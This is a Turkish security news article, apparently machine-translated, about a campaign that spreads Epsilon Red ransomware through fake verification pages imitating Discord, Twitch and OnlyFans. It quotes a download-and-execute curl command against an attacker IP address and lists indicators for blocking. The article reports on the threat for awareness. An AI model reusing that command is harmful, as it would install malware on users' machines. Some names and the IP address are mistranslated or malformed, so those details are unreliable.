Sofistike yeni fidye yazılımı kampanyası, Epsilon Red kötü amaçlı yazılım adı verilen tehlikeli bir tehdit yaymak için sahte doğrulama sayfaları kullanarak dünyanın dört bir yanındaki internet kullanıcılarını aktif olarak kandırıyor.
Bu eleştirel bulgu, önde gelen bir siber güvenlik firması olan Cloudsek’in en son tehdit istihbarat raporunda ortaya çıkıyor. İlk olarak Temmuz 2025’te tespit edilen devam eden kampanya, saldırganların Discord, Twitch ve Onlyfans gibi popüler çevrimiçi hizmetler gibi davrandığı sosyal mühendisliği kullanıyor. Bireyleri kötü niyetli indirmeye kandırırlar .HTA Komut dosyalarını doğrudan bir bilgisayarda çalıştırabilen özel HTML uygulamaları olan dosyalar.
Tarayıcı güvenlik açıkları yoluyla sessiz enfeksiyon
Cloudsec’e göre, bir kurban sahte ClickFix temalı doğrulama sayfalarından birine indiğinde ve onunla etkileşime girdiğinde, kötü niyetli komutlar bilgi olmadan arka planda çalışır.
Bu, web tarayıcılarında etkileşimli içeriğe izin veren bir teknoloji olan ActiveX kötüye kullanımı yoluyla gerçekleşir. Bu saldırıda, kötü amaçlı komut dosyası sessizce Epsilon Red Ransomware’i gizli bir konumdan indirir ve çalıştırır ve normal güvenlik kontrollerini atlar.
CloudSek’in Hackread.com ile paylaşılan analizi, komutları ortaya çıkardı curl -s -o a.exe http://155.94.155227:2269/dw/vir.exe && a.exekullanıcı tipik bir indirme penceresi görmeden fidye yazılımını indirin ve yürütür.
Daha sonra sahte bir doğrulama mesajı görüntülenir ve kullanıcıyı her şeyin normal olduğunu düşünmesi için yanıltıcıdır. Özellikle, sahte mesajda “Verifatification”, daha az şüpheli görünmek için kasıtlı bir ayrıntı olabilecek küçük bir yazım hatası var.
CloudSek’in bu keşiften sorumlu Triad ekibi, zararlı komutları bir panoya kopyalayan benzer saldırıların eski sürümlerinin aksine, bu yeni varyant kurbanları enfeksiyonun net bir uyarı olmadan gerçekleştiği ikinci bir sayfaya itti.
Bu kampanyayı destekleyen altyapı, sahte bir uyumsuzluk captcha botu da dahil olmak üzere meşru hizmetlere benzemek için tasarlanmış birkaç sahte alan ve IP adresi içerir. Ayrıca bazı randevu veya romantizm temalı cazibe sayfaları buldular. Ayrıca, başka bir kötü amaçlı yazılım, bir Quasar faresi, bu kampanyaya bağlandı ve fidye yazılımlarının yanında uzaktan kumanda potansiyelini gösterdi.
Epsilon kırmızı ve koruma adımlarını anlamak
İlk olarak 2021’de görülen Epsilon kırmızı fidye yazılımı, tanınmış Revil fidye yazılımlarından biraz benzeyen fidye notları bırakıyor, ancak ikisi nasıl çalıştıklarında farklı. Bu, farklı fidye yazılımı gruplarının birbirinden unsurları ödünç alabileceği bir eğilimi vurgular.
Bu yeni tehdide karşı korunmak için CloudSek birkaç önemli adım öneriyor. Kullanıcılar, bu tür komut dosyalarını engellemek için bilgisayarlarının ayarları aracılığıyla ActiveX ve Windows Script Ana bilgisayarını (WSH) devre dışı bırakmalıdır. Kuruluşlar ayrıca bilinen saldırgan IP adreslerini ve alan adlarını hemen engellemek için tehdit istihbarat yayınlarını kullanmalıdır. twtichcc Ve 155.94.155227:2269.
Ayrıca, web tarayıcılarından sessizce çalışan programlar gibi olağandışı gizli etkinlikleri tespit etmek için uç nokta güvenlik araçları ayarlanmalıdır. Son olarak, tanıdık çevrimiçi platformları taklit etseler bile kullanıcılara sahte doğrulama sayfalarını ve sosyal mühendislik girişimlerini tanımayı ve bunlardan kaçınmayı öğreten sürekli güvenlik farkındalığı eğitimi çok önemlidir.